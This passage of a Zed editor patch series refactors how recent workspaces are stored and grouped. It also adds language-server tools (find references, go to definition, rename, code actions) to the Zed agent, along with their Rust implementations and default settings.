= db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 2); + assert_eq!(recents[0].workspace_id, WorkspaceId(2)); + assert_eq!(recents[1].workspace_id, WorkspaceId(1)); + } + + #[gpui::test] + async fn test_delete_recent_workspace_group_removes_all_matching_rows( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = WorkspaceDb::open_test_db( + "test_delete_recent_workspace_group_removes_all_matching_rows", + ) + .await; + + fs.insert_tree( + "/the-group", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-group/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/the-group"])), + ..workspace_with(1, &[Path::new("/the-group")], empty_pane_group(), None) + }) + .await; + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/the-group"])), + ..workspace_with( + 2, + &[Path::new("/the-group/feature-a")], + empty_pane_group(), + None, + ) + }) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + assert_eq!(recents.len(), 1); + + let deleted = db.delete_recent_workspace_group(&recents[0]).await.unwrap(); + assert_eq!(deleted, vec![WorkspaceId(2), WorkspaceId(1)]); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + assert!(recents.is_empty()); } #[gpui::test] diff --git a/crates/workspace/src/persistence/model.rs b/crates/workspace/src/persistence/model.rs index f0f14cdb591053..33a05fe63562bd 100644 --- a/crates/workspace/src/persistence/model.rs +++ b/crates/workspace/src/persistence/model.rs @@ -130,6 +130,13 @@ pub(crate) struct SerializedWorkspace { pub(crate) id: WorkspaceId, pub(crate) location: SerializedWorkspaceLocation, pub(crate) paths: PathList, + /// The workspace's main worktree paths at the time this workspace was saved. + /// + /// These paths are used for grouping, deduping, and display in recent-workspace + /// UIs. They are not authoritative for reopening the workspace, because they may + /// become stale if the repository layout changes after the save. Use `paths` when + /// reopening the workspace. + pub(crate) identity_paths: Option, pub(crate) center_group: SerializedPaneGroup, pub(crate) window_bounds: Option, pub(crate) centered_layout: bool, diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index de189d89c9a219..4110cffc46d811 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -1,11 +1,10 @@ use crate::{ - NewFile, Open, OpenMode, PathList, SerializedWorkspaceLocation, ToggleWorkspaceSidebar, - Workspace, WorkspaceId, + NewFile, Open, OpenMode, PathList, RecentWorkspace, SerializedWorkspaceLocation, + ToggleWorkspaceSidebar, Workspace, item::{Item, ItemEvent}, persistence::WorkspaceDb, }; use agent_settings::AgentSettings; -use chrono::{DateTime, Utc}; use git::Clone as GitClone; use gpui::{ Action, App, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, @@ -242,14 +241,7 @@ pub struct WelcomePage { workspace: WeakEntity, focus_handle: FocusHandle, fallback_to_recent_projects: bool, - recent_workspaces: Option< - Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - >, + recent_workspaces: Option>, } impl WelcomePage { @@ -310,14 +302,11 @@ impl WelcomePage { cx: &mut Context, ) { if let Some(recent_workspaces) = &self.recent_workspaces { - if let Some((_workspace_id, location, paths, _timestamp)) = - recent_workspaces.get(action.index) - { - let is_local = matches!(location, SerializedWorkspaceLocation::Local); + if let Some(workspace) = recent_workspaces.get(action.index) { + let is_local = matches!(workspace.location, SerializedWorkspaceLocation::Local); if is_local { - let paths = paths.clone(); - let paths = paths.paths().to_vec(); + let paths = workspace.paths.paths().to_vec(); self.workspace .update(cx, |workspace, cx| { workspace @@ -433,8 +422,13 @@ impl Render for WelcomePage { .flatten() .take(5) .enumerate() - .map(|(index, (_, loc, paths, _))| { - self.render_recent_project(index, first_section_entries + index, loc, paths) + .map(|(index, workspace)| { + self.render_recent_project( + index, + first_section_entries + index, + &workspace.location, + &workspace.identity_paths, + ) }) .collect::>(); diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 45a14fa1a04b97..03b01cc79d81ad 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -84,15 +84,15 @@ pub use pane_group::{ ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext, SplitDirection, }; -use persistence::{SerializedWindowBounds, model::SerializedWorkspace}; pub use persistence::{ - WorkspaceDb, delete_unloaded_items, + RecentWorkspace, WorkspaceDb, delete_unloaded_items, model::{ DockData, DockStructure, ItemId, MultiWorkspaceState, SerializedMultiWorkspace, SerializedProjectGroup, SerializedWorkspaceLocation, SessionWorkspace, }, - read_serialized_multi_workspaces, resolve_worktree_workspaces, + read_serialized_multi_workspaces, }; +use persistence::{SerializedWindowBounds, model::SerializedWorkspace}; use postage::stream::Stream; use project::{ DirectoryLister, Project, ProjectEntryId, ProjectPath, ResolvedPath, Worktree, WorktreeId, @@ -6857,11 +6857,13 @@ impl Workspace { let center_group = build_serialized_pane_group(&self.center.root, window, cx); let docks = build_serialized_docks(self, window, cx); let window_bounds = Some(SerializedWindowBounds(window.window_bounds())); + let identity_paths_hint = self.project_group_key(cx).path_list().clone(); let serialized_workspace = SerializedWorkspace { id: database_id, location, paths, + identity_paths: Some(identity_paths_hint), center_group, window_bounds, display: Default::default(), @@ -8947,7 +8949,7 @@ pub async fn last_opened_workspace_location( .await .log_err() .flatten() - .map(|(id, location, paths, _timestamp)| (id, location, paths)) + .map(|workspace| (workspace.workspace_id, workspace.location, workspace.paths)) } pub async fn last_session_workspace_locations( @@ -9068,7 +9070,7 @@ pub async fn apply_restored_multiworkspace_state( && let Some(common_dir) = project::discover_root_repo_common_dir(path, fs.as_ref()).await { - let main_path = common_dir.parent().unwrap_or(&common_dir); + let main_path = project::repo_identity_path(&common_dir); resolved_paths.push(main_path.to_path_buf()); } else { resolved_paths.push(path.to_path_buf()); From 3b7917ede76640773f1e6612485acb088ca4f11e Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Tue, 5 May 2026 10:35:08 +0100 Subject: [PATCH 186/231] agent: LSP tools (#55744) Adds 4 (technically 5) new tools to the zed agent, corresponding to LSP actions: - `find_references` - `goto_definition` - `rename_symbol` - `get_code_actions` and `apply_code_actions` Notes: - `rename_symbol` skips doing a `prepare_rename`. If there is nothing to rename at the position, it will forward the error to the agent - The code action tools are stateful. The state is stored in the `get_code_actions` tool itself as a `PendingCodeActions`. It is not passed into/out of subagents. Calling `apply_code_actions` without calling `get_code_actions` first is an error, but I've never seen an agent do this Symbols are identified by: - file name - line number - symbol If there is no substring match on that line for the symbol text, it is an error. If there are multiple, it chooses the first. This may not be great if you have a line like: `fn convert(x: foo::Something) -> bar::Something` - the second `Something` is a different symbol, but is inacessible to these tools. Probably fine for now, but we can look into improving Release Notes: - Added: New tools for the Zed Agent for interacting with language servers --------- Co-authored-by: Lukas Wirth --- assets/settings/default.json | 10 +- crates/agent/src/thread.rs | 26 +- crates/agent/src/tools.rs | 17 ++ .../agent/src/tools/apply_code_action_tool.rs | 145 +++++++++++ .../agent/src/tools/find_references_tool.rs | 104 ++++++++ .../agent/src/tools/get_code_actions_tool.rs | 119 +++++++++ .../agent/src/tools/go_to_definition_tool.rs | 113 +++++++++ crates/agent/src/tools/rename_tool.rs | 121 +++++++++ crates/agent/src/tools/symbol_locator.rs | 239 ++++++++++++++++++ crates/feature_flags/src/flags.rs | 12 + crates/gpui/src/test.rs | 10 +- .../src/pages/tool_permissions_setup.rs | 5 + 12 files changed, 912 insertions(+), 9 deletions(-) create mode 100644 crates/agent/src/tools/apply_code_action_tool.rs create mode 100644 crates/agent/src/tools/find_references_tool.rs create mode 100644 crates/agent/src/tools/get_code_actions_tool.rs create mode 100644 crates/agent/src/tools/go_to_definition_tool.rs create mode 100644 crates/agent/src/tools/rename_tool.rs create mode 100644 crates/agent/src/tools/symbol_locator.rs diff --git a/assets/settings/default.json b/assets/settings/default.json index cd2e164dfb0de5..624dcc0f01233a 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -1108,13 +1108,18 @@ "create_directory": true, "delete_path": true, "diagnostics": true, + "apply_code_action": true, "edit_file": true, "fetch": true, + "find_path": true, + "find_references": true, + "get_code_actions": true, + "go_to_definition": true, "list_directory": true, "project_notifications": false, "move_path": true, "now": true, - "find_path": true, + "rename_symbol": true, "read_file": true, "restore_file_from_disk": true, "save_file": true, @@ -1138,6 +1143,9 @@ "project_notifications": false, "now": true, "find_path": true, + "find_references": true, + "get_code_actions": true, + "go_to_definition": true, "read_file": true, "open": true, "grep": true, diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 308bc843b1a4f5..c6979391673ec6 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -1,14 +1,15 @@ use crate::{ - ContextServerRegistry, CopyPathTool, CreateDirectoryTool, DbLanguageModel, DbThread, - DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, - ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, + ApplyCodeActionTool, CodeActionStore, ContextServerRegistry, CopyPathTool, CreateDirectoryTool, + DbLanguageModel, DbThread, DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, + FindPathTool, FindReferencesTool, GetCodeActionsTool, GoToDefinitionTool, GrepTool, + ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RenameTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{FeatureFlagAppExt as _, UpdatePlanToolFeatureFlag}; +use feature_flags::{FeatureFlagAppExt as _, LspToolFeatureFlag, UpdatePlanToolFeatureFlag}; use agent_client_protocol::schema as acp; use agent_settings::{ @@ -1542,7 +1543,6 @@ impl Thread { self.project.clone(), self.action_log.clone(), )); - self.add_tool(DiagnosticsTool::new(self.project.clone())); self.add_tool(EditFileTool::new( self.project.clone(), cx.weak_entity(), @@ -1569,6 +1569,22 @@ impl Thread { self.add_tool(TerminalTool::new(self.project.clone(), environment.clone())); self.add_tool(WebSearchTool); + self.add_tool(DiagnosticsTool::new(self.project.clone())); + if cx.has_flag::() { + let code_action_store: CodeActionStore = cx.new(|_cx| None); + self.add_tool(FindReferencesTool::new(self.project.clone())); + self.add_tool(GetCodeActionsTool::new( + self.project.clone(), + code_action_store.clone(), + )); + self.add_tool(ApplyCodeActionTool::new( + self.project.clone(), + code_action_store, + )); + self.add_tool(GoToDefinitionTool::new(self.project.clone())); + self.add_tool(RenameTool::new(self.project.clone())); + } + if self.depth() < MAX_SUBAGENT_DEPTH { self.add_tool(SpawnAgentTool::new(environment)); } diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index b9db30ce432c28..e629f41e6d5d77 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -1,3 +1,4 @@ +mod apply_code_action_tool; mod context_server_registry; mod copy_path_tool; mod create_directory_tool; @@ -8,15 +9,20 @@ mod edit_file_tool; mod evals; mod fetch_tool; mod find_path_tool; +mod find_references_tool; +mod get_code_actions_tool; +mod go_to_definition_tool; mod grep_tool; mod list_directory_tool; mod move_path_tool; mod now_tool; mod open_tool; mod read_file_tool; +mod rename_tool; mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; +mod symbol_locator; mod terminal_tool; mod tool_permissions; mod update_plan_tool; @@ -25,6 +31,7 @@ mod web_search_tool; use crate::AgentTool; use language_model::{LanguageModelRequestTool, LanguageModelToolSchemaFormat}; +pub use apply_code_action_tool::*; pub use context_server_registry::*; pub use copy_path_tool::*; pub use create_directory_tool::*; @@ -33,15 +40,20 @@ pub use diagnostics_tool::*; pub use edit_file_tool::*; pub use fetch_tool::*; pub use find_path_tool::*; +pub use find_references_tool::*; +pub use get_code_actions_tool::*; +pub use go_to_definition_tool::*; pub use grep_tool::*; pub use list_directory_tool::*; pub use move_path_tool::*; pub use now_tool::*; pub use open_tool::*; pub use read_file_tool::*; +pub use rename_tool::*; pub use restore_file_from_disk_tool::*; pub use save_file_tool::*; pub use spawn_agent_tool::*; +pub use symbol_locator::*; pub use terminal_tool::*; pub use tool_permissions::*; pub use update_plan_tool::*; @@ -116,6 +128,7 @@ macro_rules! tools { } tools! { + ApplyCodeActionTool, CopyPathTool, CreateDirectoryTool, DeletePathTool, @@ -123,12 +136,16 @@ tools! { EditFileTool, FetchTool, FindPathTool, + FindReferencesTool, + GetCodeActionsTool, + GoToDefinitionTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ReadFileTool, + RenameTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, diff --git a/crates/agent/src/tools/apply_code_action_tool.rs b/crates/agent/src/tools/apply_code_action_tool.rs new file mode 100644 index 00000000000000..409546d89d0ba6 --- /dev/null +++ b/crates/agent/src/tools/apply_code_action_tool.rs @@ -0,0 +1,145 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::CodeActionStore; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Applies a code action previously retrieved by get_code_actions. +/// +/// You must call get_code_actions first to get the list of available actions, +/// then use the number from that list to choose which action to apply. +/// +/// After applying a code action, the list is cleared. If you want to apply +/// another action, call get_code_actions again. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct ApplyCodeActionToolInput { + /// The 1-based index of the code action to apply, from the list + /// returned by get_code_actions. + pub index: u32, +} + +pub struct ApplyCodeActionTool { + project: Entity, + code_action_store: CodeActionStore, +} + +impl ApplyCodeActionTool { + pub fn new(project: Entity, code_action_store: CodeActionStore) -> Self { + Self { + project, + code_action_store, + } + } +} + +impl AgentTool for ApplyCodeActionTool { + type Input = ApplyCodeActionToolInput; + type Output = String; + + const NAME: &'static str = "apply_code_action"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + input: Result, + cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + let title = self + .code_action_store + .read(cx) + .as_ref() + .and_then(|pending| { + let index = input.index.checked_sub(1)? as usize; + Some(pending.actions.get(index)?.lsp_action.title().to_string()) + }); + if let Some(title) = title { + format!("Apply code action: {title}").into() + } else { + format!("Apply code action #{}", input.index).into() + } + } else { + "Apply code action".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + let store = self.code_action_store.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let pending = store.update(cx, |store, _cx| store.take()).ok_or_else(|| { + "No code actions available. Call get_code_actions first.".to_string() + })?; + + let zero_based_index = input + .index + .checked_sub(1) + .ok_or_else(|| "Index must be 1 or greater.".to_string())?; + + let action = pending + .actions + .get(zero_based_index as usize) + .cloned() + .ok_or_else(|| { + format!( + "Index {} is out of range. There were {} code action(s) available.", + input.index, + pending.actions.len() + ) + })?; + + let title = action.lsp_action.title().to_string(); + let buffer = pending.buffer.clone(); + + let apply_task = project.update(cx, |project, cx| { + project.apply_code_action(buffer, action, true, cx) + }); + + let transaction = apply_task + .await + .map_err(|e| format!("Failed to apply code action '{title}': {e}"))?; + + if transaction.0.is_empty() { + return Ok(format!( + "Code action '{title}' was applied but made no changes.", + )); + } + + let mut output = format!( + "Applied code action '{title}'. Modified {} file(s):\n", + transaction.0.len() + ); + + for (buffer, _) in &transaction.0 { + buffer.read_with(cx, |buffer, cx| { + let path = buffer + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + writeln!(output, "- {path}").ok(); + }); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/find_references_tool.rs b/crates/agent/src/tools/find_references_tool.rs new file mode 100644 index 00000000000000..f829e150464d06 --- /dev/null +++ b/crates/agent/src/tools/find_references_tool.rs @@ -0,0 +1,104 @@ +use std::fmt::Write; +use std::sync::Arc; + +use super::symbol_locator::{LocationDisplay, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Finds all references to a symbol across the project using the language server. +/// +/// Returns a list of locations where the symbol is referenced, including file paths, +/// line numbers, and code snippets for each reference. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct FindReferencesToolInput { + /// The symbol to find references of. + pub symbol: SymbolLocator, +} + +pub struct FindReferencesTool { + project: Entity, +} + +impl FindReferencesTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for FindReferencesTool { + type Input = FindReferencesToolInput; + type Output = String; + + const NAME: &'static str = "find_references"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Find references to `{}`", input.symbol.symbol_name).into() + } else { + "Find references".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let references_task = project.update(cx, |project, cx| { + project.references(&resolved.buffer, resolved.position, cx) + }); + + let references = references_task + .await + .map_err(|e| format!("Find references failed: {e}"))? + .unwrap_or_default(); + + if references.is_empty() { + return Ok(format!( + "No references found for '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = format!( + "Found {} references to `{}`:\n", + references.len(), + input.symbol.symbol_name + ); + + for location in &references { + let display = location + .buffer + .read_with(cx, |_, cx| LocationDisplay::from_location(location, cx)); + write!(output, "\n## {display}\n").ok(); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/get_code_actions_tool.rs b/crates/agent/src/tools/get_code_actions_tool.rs new file mode 100644 index 00000000000000..7f4fc81ec3f13b --- /dev/null +++ b/crates/agent/src/tools/get_code_actions_tool.rs @@ -0,0 +1,119 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::{CodeActionStore, PendingCodeActions, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Gets the list of available code actions at a symbol location from the language server. +/// +/// Code actions include quick fixes, refactorings, and other automated transformations +/// suggested by the language server (e.g. "Add missing import", "Extract to function"). +/// +/// Returns a numbered list of available actions. Use apply_code_action with the +/// corresponding number to apply one. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct GetCodeActionsToolInput { + /// The symbol to get code actions for. + pub symbol: SymbolLocator, +} + +pub struct GetCodeActionsTool { + project: Entity, + code_action_store: CodeActionStore, +} + +impl GetCodeActionsTool { + pub fn new(project: Entity, code_action_store: CodeActionStore) -> Self { + Self { + project, + code_action_store, + } + } +} + +impl AgentTool for GetCodeActionsTool { + type Input = GetCodeActionsToolInput; + type Output = String; + + const NAME: &'static str = "get_code_actions"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Get code actions for `{}`", input.symbol.symbol_name).into() + } else { + "Get code actions".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + let store = self.code_action_store.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let actions_task = project.update(cx, |project, cx| { + let range = resolved.position..resolved.position; + project.code_actions(&resolved.buffer, range, None, cx) + }); + + let actions = actions_task + .await + .map_err(|e| format!("Failed to get code actions: {e}"))? + .unwrap_or_default(); + + if actions.is_empty() { + store.update(cx, |store, _cx| *store = None); + return Ok(format!( + "No code actions available for '{}' at this location.", + input.symbol.symbol_name + )); + } + + let mut output = format!("Found {} code action(s):\n", actions.len()); + for (i, action) in actions.iter().enumerate() { + writeln!(output, "{}. {}", i + 1, action.lsp_action.title()).ok(); + } + write!( + output, + "\nUse apply_code_action with the number of the action you want to apply." + ) + .ok(); + + store.update(cx, |store, _cx| { + *store = Some(PendingCodeActions { + actions, + buffer: resolved.buffer, + }); + }); + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/go_to_definition_tool.rs b/crates/agent/src/tools/go_to_definition_tool.rs new file mode 100644 index 00000000000000..2061da124b0725 --- /dev/null +++ b/crates/agent/src/tools/go_to_definition_tool.rs @@ -0,0 +1,113 @@ +use std::fmt::Write; +use std::sync::Arc; + +use super::symbol_locator::{LocationDisplay, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Jumps to the definition of a symbol using the language server. +/// +/// Returns the file path and line number of the symbol's definition, +/// along with a snippet of the source code at that location. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number of a usage you want to navigate from. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct GoToDefinitionToolInput { + /// The symbol to find the definition of. + pub symbol: SymbolLocator, +} + +pub struct GoToDefinitionTool { + project: Entity, +} + +impl GoToDefinitionTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for GoToDefinitionTool { + type Input = GoToDefinitionToolInput; + type Output = String; + + const NAME: &'static str = "go_to_definition"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Go to definition of `{}`", input.symbol.symbol_name).into() + } else { + "Go to definition".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let definitions_task = project.update(cx, |project, cx| { + project.definitions(&resolved.buffer, resolved.position, cx) + }); + + let definitions = definitions_task + .await + .map_err(|e| format!("Go to definition failed: {e}"))? + .unwrap_or_default(); + + if definitions.is_empty() { + return Ok(format!( + "No definition found for '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = String::new(); + + if definitions.len() == 1 { + write!(output, "Definition of `{}`:\n", input.symbol.symbol_name).ok(); + } else { + write!( + output, + "Found {} definitions of `{}`:\n", + definitions.len(), + input.symbol.symbol_name + ) + .ok(); + } + + for link in &definitions { + let display = link + .target + .buffer + .read_with(cx, |_, cx| LocationDisplay::from_location(&link.target, cx)); + write!(output, "\n## {display}\n").ok(); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/rename_tool.rs b/crates/agent/src/tools/rename_tool.rs new file mode 100644 index 00000000000000..7abc45d6956874 --- /dev/null +++ b/crates/agent/src/tools/rename_tool.rs @@ -0,0 +1,121 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::SymbolLocator; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Renames a symbol across the project using the language server. +/// +/// This performs a semantic rename, updating all references to the symbol +/// across all files in the project. The language server determines which +/// occurrences to rename based on the symbol's type and scope. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct RenameToolInput { + /// The symbol to rename. + pub symbol: SymbolLocator, + + /// The new name for the symbol. + pub new_name: String, +} + +pub struct RenameTool { + project: Entity, +} + +impl RenameTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for RenameTool { + type Input = RenameToolInput; + type Output = String; + + const NAME: &'static str = "rename_symbol"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!( + "Rename `{}` to `{}`", + input.symbol.symbol_name, input.new_name + ) + .into() + } else { + "Rename symbol".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let rename_task = project.update(cx, |project, cx| { + project.perform_rename( + resolved.buffer.clone(), + resolved.position, + input.new_name.clone(), + cx, + ) + }); + + let transaction = rename_task + .await + .map_err(|e| format!("Rename failed: {e}"))?; + + if transaction.0.is_empty() { + return Ok(format!( + "No changes were made. The language server could not rename '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = format!( + "Renamed `{}` to `{}` in {} file(s):\n", + input.symbol.symbol_name, + input.new_name, + transaction.0.len() + ); + + for (buffer, _) in &transaction.0 { + buffer.read_with(cx, |buffer, cx| { + let path = buffer + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + writeln!(output, "- {path}").ok(); + }); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/symbol_locator.rs b/crates/agent/src/tools/symbol_locator.rs new file mode 100644 index 00000000000000..cb38101877ea2a --- /dev/null +++ b/crates/agent/src/tools/symbol_locator.rs @@ -0,0 +1,239 @@ +use std::collections::VecDeque; +use std::fmt; + +use gpui::{App, AsyncApp, Entity}; +use language::{Buffer, Location}; +use project::{CodeAction, Project}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use text::ToPoint as _; +use text::{Anchor, Point}; + +/// Identifies a specific symbol (declaration or usage) in the source code. +/// +/// Use the file path, line number, and symbol name from file outlines, grep results, +/// or other tool outputs to populate these fields. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct SymbolLocator { + /// The relative path of the file containing the symbol + /// (e.g. "crates/editor/src/editor.rs"). + pub file_path: String, + + /// The 1-based line number where the symbol appears. + /// Use the line numbers from file outlines or grep results. + pub line: u32, + + /// The name of the symbol (function name, type name, variable name, etc.) + pub symbol_name: String, +} + +pub struct PendingCodeActions { + pub actions: Vec, + pub buffer: Entity, +} + +pub type CodeActionStore = Entity>; + +pub struct ResolvedSymbol { + pub buffer: Entity, + pub position: Anchor, + pub line_text: String, + pub truncated: bool, +} + +pub const MAX_LINE_DISPLAY_LEN: usize = 200; + +pub struct LocationDisplay { + pub path: String, + pub start_line: u32, + pub end_line: u32, + pub snippet: String, + pub truncated: bool, +} + +impl LocationDisplay { + pub fn from_location(location: &Location, cx: &App) -> Self { + let snapshot = location.buffer.read(cx).snapshot(); + let range = + location.range.start.to_point(&snapshot)..location.range.end.to_point(&snapshot); + let path = location + .buffer + .read(cx) + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + + let start_line = range.start.row + 1; + let end_line = range.end.row + 1; + + let line_len = snapshot.line_len(range.start.row); + let truncated = line_len as usize > MAX_LINE_DISPLAY_LEN; + let snippet: String = snapshot + .text_for_range(Point::new(range.start.row, 0)..Point::new(range.start.row, line_len)) + .flat_map(|chunk| chunk.chars()) + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect::(); + let snippet = snippet.trim_end().to_string(); + + Self { + path, + start_line, + end_line, + snippet, + truncated, + } + } +} + +impl fmt::Display for LocationDisplay { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + let truncated_label = if self.truncated { " (truncated)" } else { "" }; + if self.start_line == self.end_line { + writeln!(f, "{}#L{}{truncated_label}", self.path, self.start_line)?; + } else { + writeln!( + f, + "{}#L{}-{}{truncated_label}", + self.path, self.start_line, self.end_line + )?; + } + writeln!(f, "```")?; + writeln!(f, "{}", self.snippet)?; + write!(f, "```") + } +} + +/// Searches for `needle` in a char iterator, returning the byte offset of the +/// first occurrence without collecting the full iterator into a string. +/// +/// Equivalent to [`str::find`] +fn find_in_char_iter(chars: impl Iterator, needle: &str) -> Option { + let needle_chars: Vec = needle.chars().collect(); + if needle_chars.is_empty() { + return Some(0); + } + + let mut window: 